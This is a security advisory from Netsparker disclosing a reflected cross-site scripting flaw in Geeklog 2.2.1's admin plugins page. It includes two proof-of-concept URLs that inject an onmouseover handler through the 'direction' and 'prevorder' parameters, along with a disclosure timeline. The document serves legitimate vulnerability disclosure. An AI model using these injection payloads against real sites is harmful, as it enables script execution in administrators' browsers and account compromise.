Information
--------------------

Advisory by Netsparker
Name: Cross-Site Scripting Vulnerability in Geeklog
Affected Software: Geeklog
Affected Versions: 2.2.1
Vendor Homepage: https://www.geeklog.net/
Vulnerability Type: Cross-Site Scripting
Severity: Important
Status: Fixed
CVSS Score (3.0): 7.4 (High)
Netsparker Advisory Reference: NS-20-001

Technical Details
--------------------

Cross-site Scripting

URL : http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=x"%20onmouseover=netsparker(0x01AAEC)%20x="&order=1&prevorder=pi_load
Parameter Name : direction
Parameter Type : GET
Attack Pattern : x%22+onmouseover%3dnetsparker(0x01AAEC)+x%3d%22

URL : http://sectestapp/geeklog-2.2.1/public_html/admin/plugins.php?direction=ASC&order=1&prevorder=x"%20onmouseover=netsparker(0x019E05)%20x="
Parameter Name : prevorder
Parameter Type : GET
Attack Pattern : x%22+onmouseover%3dnetsparker(0x019E05)+x%3d%22

For more information on cross-site scripting vulnerabilities read the article The Cross-site Scripting (XSS) Vulnerability: Definition and Prevention.

Advisory Timeline
--------------------

11th March 2020 - First Contact
20th April 2020 - Vendor Fixed
27th April 2020 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Omar Kurt while testing the Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanner finds and reports security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be highly accurate in reporting vulnerabilities.